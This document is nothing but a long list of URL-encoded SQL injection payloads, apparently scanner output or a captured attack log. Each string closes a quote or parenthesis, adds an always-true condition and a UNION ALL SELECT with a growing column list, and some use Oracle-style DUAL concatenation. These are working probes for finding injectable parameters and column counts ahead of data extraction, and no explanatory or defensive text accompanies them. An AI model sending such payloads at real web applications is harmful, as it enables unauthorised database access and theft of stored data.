-1895%22%29%20WHERE%203519%3D3519%20UNION%20ALL%20SELECT%203519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519%2C3519--%20 -2638%22%29%20WHERE%209550%3D9550%20UNION%20ALL%20SELECT%209550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550--%20 -3498%22%29%20WHERE%203461%3D3461%20UNION%20ALL%20SELECT%203461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461%2C3461--%20 -8023%22%29%20WHERE%206690%3D6690%20UNION%20ALL%20SELECT%206690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690%2C6690--%20 -1956%29%20WHERE%202025%3D2025%20UNION%20ALL%20SELECT%202025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025--%20 -5457%29%20WHERE%208602%3D8602%20UNION%20ALL%20SELECT%208602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602--%20 -8582%29%20WHERE%208480%3D8480%20UNION%20ALL%20SELECT%208480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480--%20 -5327%29%20WHERE%201664%3D1664%20UNION%20ALL%20SELECT%201664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664%2C1664--%20 -3178%29%20WHERE%204550%3D4550%20UNION%20ALL%20SELECT%204550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550--%20 -9516%29%20WHERE%208135%3D8135%20UNION%20ALL%20SELECT%208135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135--%20 -8728%29%20WHERE%204670%3D4670%20UNION%20ALL%20SELECT%204670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670%2C4670--%20 -8772%29%20WHERE%208734%3D8734%20UNION%20ALL%20SELECT%208734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734--%20 -7636%29%20WHERE%206388%3D6388%20UNION%20ALL%20SELECT%206388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388--%20 -6305%29%20WHERE%207691%3D7691%20UNION%20ALL%20SELECT%207691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691%2C7691--%20 -8542%27%20WHERE%203057%3D3057%20UNION%20ALL%20SELECT%203057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057--%20 -8972%27%20WHERE%202443%3D2443%20UNION%20ALL%20SELECT%202443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443--%20 -3307%27%20WHERE%209815%3D9815%20UNION%20ALL%20SELECT%209815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815%2C9815--%20 -9402%27%20WHERE%209880%3D9880%20UNION%20ALL%20SELECT%209880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880--%20 -1607%27%20WHERE%202212%3D2212%20UNION%20ALL%20SELECT%202212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212%2C2212--%20 -3310%27%20WHERE%201326%3D1326%20UNION%20ALL%20SELECT%201326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326--%20 -7213%27%20WHERE%209842%3D9842%20UNION%20ALL%20SELECT%209842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842%2C9842--%20 -7958%27%20WHERE%204553%3D4553%20UNION%20ALL%20SELECT%204553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553%2C4553--%20 -3365%27%20WHERE%205650%3D5650%20UNION%20ALL%20SELECT%205650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650--%20 -2611%27%20WHERE%203054%3D3054%20UNION%20ALL%20SELECT%203054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054%2C3054--%20 -8000%22%20WHERE%208206%3D8206%20UNION%20ALL%20SELECT%208206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206--%20 -2384%22%20WHERE%204149%3D4149%20UNION%20ALL%20SELECT%204149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149--%20 -3862%22%20WHERE%206706%3D6706%20UNION%20ALL%20SELECT%206706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706%2C6706--%20 -1600%22%20WHERE%204027%3D4027%20UNION%20ALL%20SELECT%204027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027--%20 -9770%22%20WHERE%202001%3D2001%20UNION%20ALL%20SELECT%202001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001--%20 -7515%22%20WHERE%203564%3D3564%20UNION%20ALL%20SELECT%203564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564--%20 -6220%22%20WHERE%208378%3D8378%20UNION%20ALL%20SELECT%208378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378--%20 -6000%22%20WHERE%206093%3D6093%20UNION%20ALL%20SELECT%206093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093--%20 -5129%22%20WHERE%207211%3D7211%20UNION%20ALL%20SELECT%207211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211--%20 -9052%22%20WHERE%206199%3D6199%20UNION%20ALL%20SELECT%206199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199--%20 -4671%20WHERE%204734%3D4734%20UNION%20ALL%20SELECT%204734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734%2C4734--%20 -8765%20WHERE%201793%3D1793%20UNION%20ALL%20SELECT%201793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793--%20 -3148%20WHERE%206550%3D6550%20UNION%20ALL%20SELECT%206550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550%2C6550--%20 -9057%20WHERE%201233%3D1233%20UNION%20ALL%20SELECT%201233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233--%20 -4500%20WHERE%201775%3D1775%20UNION%20ALL%20SELECT%201775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775%2C1775--%20 -4509%20WHERE%203516%3D3516%20UNION%20ALL%20SELECT%203516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516%2C3516--%20 -5972%20WHERE%204086%3D4086%20UNION%20ALL%20SELECT%204086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086--%20 -5784%20WHERE%204195%3D4195%20UNION%20ALL%20SELECT%204195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195--%20 -6881%20WHERE%206668%3D6668%20UNION%20ALL%20SELECT%206668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668--%20 -4610%20WHERE%204255%3D4255%20UNION%20ALL%20SELECT%204255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255--%20 -7632%27%7C%7C%28SELECT%20%27ESUP%27%20FROM%20DUAL%20WHERE%205593%3D5593%20UNION%20ALL%20SELECT%205593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593--%20 -7928%27%7C%7C%28SELECT%20%27sSOm%27%20FROM%20DUAL%20WHERE%204948%3D4948%20UNION%20ALL%20SELECT%204948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948%2C4948--%20 -4147%27%7C%7C%28SELECT%20%27fdJe%27%20FROM%20DUAL%20WHERE%204439%3D4439%20UNION%20ALL%20SELECT%204439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439%2C4439--%20 -1318%27%7C%7C%28SELECT%20%27zoHf%27%20FROM%20DUAL%20WHERE%205130%3D5130%20UNION%20ALL%20SELECT%205130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130%2C5130--%20 -4582%27%7C%7C%28SELECT%20%27EWTq%27%20FROM%20DUAL%20WHERE%202356%3D2356%20UNION%20ALL%20SELECT%202356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356--%20 -5645%27%7C%7C%28SELECT%20%27pTcv%27%20FROM%20DUAL%20WHERE%205340%3D5340%20UNION%20ALL%20SELECT%205340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340--%20 -3887%27%7C%7C%28SELECT%20%27fDGA%27%20FROM%20DUAL%20WHERE%205070%3D5070%20UNION%20ALL%20SELECT%205070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070%2C5070--%20 -7276%27%7C%7C%28SELECT%20%27MHPt%27%20FROM%20DUAL%20WHERE%209183%3D9183%20UNION%20ALL%20SELECT%209183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183--%20 -1810%27%7C%7C%28SELECT%20%27jqZG%27%20FROM%20DUAL%20WHERE%208838%3D8838%20UNION%20ALL%20SELECT%208838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838--%20 -1862%27%7C%7C%28SELECT%20%27KxvC%27%20FROM%20DUAL%20WHERE%206556%3D6556%20UNION%20ALL%20SELECT%206556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556--%20 -6385%27%7C%7C%28SELECT%20%27dpbr%27%20WHERE%204272%3D4272%20UNION%20ALL%20SELECT%204272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272--%20 